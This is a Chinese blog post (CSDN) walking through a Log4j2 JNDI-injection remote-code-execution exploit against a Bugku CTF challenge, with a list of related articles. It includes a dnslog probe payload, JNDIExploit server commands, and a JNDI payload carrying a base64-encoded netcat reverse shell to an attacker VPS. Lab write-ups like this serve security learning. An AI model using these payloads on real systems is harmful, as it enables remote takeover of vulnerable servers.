Log4j2_RCE漏洞复现

最新推荐文章于 2024-04-08 07:36:52 发布
最新推荐文章于 2024-04-08 07:36:52 发布
阅读量1.7k 收藏 5
点赞数 1
分类专栏: 漏洞复现 文章标签: log4j2 远程代码执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/122034507
版权

Log4j2_RCE漏洞复现

漏洞介绍

Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。经过分析,该组件存在Java JNDI注入漏洞,当程序将用户输入的数据进行日志,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。

漏洞地址

https://ctf.bugku.com/challenges/detail/id/340.html

复现过程

首先这里需要一台外网VPS服务器,然后在上面安装JNDI注入工具

打开题目

先使用dnslog进行测试
${jndi:ldap://2c7b25a4.xxxxx.ceye.io/exp}
填在账号输入的位置即可,密码随便填

然后点击提交
可以看到笔者这边的dnslog平台成功返回一条记录,说明存在Log4j2_RCE漏洞

开启ldap和http服务监听
java -jar JNDIExploit-master.jar -i [自己的公网VPS地址]

新开一个界面,使用nc监听本地的12345端口

进行jndi注入攻击
${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/[base64加密后命令]}
直接填写base64加密的反弹shell命令即可
nc x.x.x.x 12345 -e /bin/sh
base64编码网站:https://www.qqxiuzi.cn/bianma/base64.htm

把这条注入表达式填入登陆的user框中, 密码随便填一个即可

${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/bmMgeC54LngueCAxMjM0NSAtZSAvYmluL3No}

然后点击提交

可以看到nc监听的端口是成功返回了一个会话,Log4j2_RCE漏洞复现成功,在其根目录下面成功获取flag

super 硕
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Apache Log4j2 RCE 命令执行漏洞预警及修复方案
HBohan的博客
12-12 1569
漏洞名称:Apache Log4j2远程代码执行漏洞 组件名称:Apache Log4j2 截止2021年12⽉10⽇,受影响的Apache log4j2版本: 2.0≤Apache Log4j<=2.15.0-rc1 漏洞类型:远程代码执行
Log4j2 RCE 简单复现
ChamZhiZe的博客
01-10 629
一:所以环境 java 1.8.0_u172+idea 注:高版本的java不行,最好是在java1.8.0_u140以前的版本复现。 二:复现过程 github上下载本次复现所需要的东西: 第一步 你需要知道你的IP地址,因为是本地复现,所以就是你本地的物理机IP,也可以是你服务器的IP地址,总之一定是自己的IP地址。你要是做一些坏事儿,铁手镯会带到你的手腕上,请你到里面喝喝茶。 第二步 开启你的LDAP服务,在文件加的POC文件夹下,通过cmd启动你的LDAP服务 java -jar JNDIExp
log4j2 RCE漏洞复现(1),2024年大厂网络安全面经
最新发布
m0_60453176的博客
04-08 376
下载log4j2镜像:(我们选择vulfocus/log4j2-rce-2021-12-09进行验证)启动log4j2镜像:浏览器登录:点击?????得到ok,显示payload=111创建临时域名:2oaj3e.dnslog.cn。
Log4j2 RCE(CVE-2021-44228)漏洞复现
博客地址 www.sec0nd.top
02-23 2222
Log4j2 RCE(CVE-2021-44228)漏洞复现 文章目录Log4j2 RCE(CVE-2021-44228)漏洞复现准备环境复现过程:用JNDIExploit启动一个ldap的服务使用BP抓包工具构造一个请求不足总结 准备环境 Log4j2这个漏洞是我第一次复现,因为还未学到javaweb方面的东西,就一直搁置着这个 首先把师傅给的项目文件运行一下 发现报错,这里有一行不完整,因为我也不清楚这里应该是什么就先忽略了。 忽略这行不完整的,可以正常运行 下面状态栏可以看到打开了8080端口,
Log4j2 RCE漏洞复现
守拙的博客
12-10 4467
最新log4j rce漏洞复现
[Java安全]—log4j2 rce复现
Sentiment的博客
07-09 1106
漏洞爆出已经半年多了,可当时还是个java啥都不懂的菜鸡所以也没能及时复现,现在捡起来复现下21年席卷整个安全圈的log4j2漏洞log4j 是 javaweb 的日志组件,用来记录 web日志 去指定下载文件的url 在搜索框或者搜索的 url 里面加上${jndi:ldap://127.0.0.1/test} ,log4j 会对这串代码进行表达式解析,给 lookup 传递一个恶意的参数指定,参数指的是比如 ldap 不存在的资源 $ 是会被直接执行的。后面再去指定下载文件的 url,去下载我们的恶意
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具复现一遍
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
LOG4J RCE 漏洞分享与自查.pdf
12-15
Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j ...
log4j2-rce靶场.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
JNDIExploit.zip
12-14
JNDIExploit
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
Log4j远程执行RCE复现GET和POST
qq_30947463的博客
05-04 1138
从安装docker和vulfocus到漏洞复现
Log4j2与JNDI结合
cloud的技术积累
06-04 4369
Log4j2和JNDI结合指定配置文件路径和日志文件
Log4j2-RCE
xlsj雪松的博客
12-26 3021
1 Log4j2漏洞官方描述 Apache Log4j2 版本 2.0-alpha1 到 2.16.0(不包括 2.12.3)没有防止自引用查找的不受控制的递归。当日志配置使用带有上下文查找的非默认模式布局(例如,$${ctx:loginId})时,控制线程上下文映射 (MDC) 输入数据的攻击者可以制作包含递归查找的恶意输入数据,导致 StackOverflowError 将终止进程。这也称为 DOS(拒绝服务)攻击。 Log4j 2.x 缓解措施 升级到 Log4j 2.3.1(适用于 Java
致远OA Log4j2存在RCE
战神/calmness的博客
12-14 4681
目录 描述 Payload: 影响: 过程: 结果如下在dnslog上显示 描述 致远互联A8+是面向集团化、国际化、产业链和大型组织机构、涉外工作组织及组织群,针对其 组织范围内外协作应用设计的集团化管控和业务管控的一体化门户平台和工作入口。由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可在受影响的致远相关版本进行代码执行,发现在野利用,建议相关用户尽快采取措施进行排查与防护。 Apache Log4j2是一款Ap...
Log4j2的JNDI注入漏洞原理分析与思考
m0_69745415的博客
05-05 431
因为存在前身Log4j,而且都是Apache下的项目,不管是jar包名称还是package名称,看起来都很相似,导致有些人分不清自己用的是Log4j还是Log4j2。这里给出几个辨别方法: Log4j2分为2个jar包,一个是接口 log4j-api-版本号.jar ,一个是具体实现 log4j−core−{版本号}.jar ,一个是具体实现 log4j-core-版本号.jar ,一个是具体实现 log4j−core−{版本号}.j
thinkphp2_rce_2漏洞
05-02
thinkphp2_rce_2是指ThinkPHP 2.1.0至2.1.2版本中存在的一种远程命令执行漏洞。攻击者可以通过精心构造的请求,将恶意代码注入到目标服务器上,并执行任意命令。这个漏洞的原因是由于ThinkPHP在处理控制器的参数时,没有对参数进行过滤和检查,导致攻击者可以通过构造的参数来执行任意的命令。该漏洞已经被修复,请尽快升级到最新版本的ThinkPHP。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值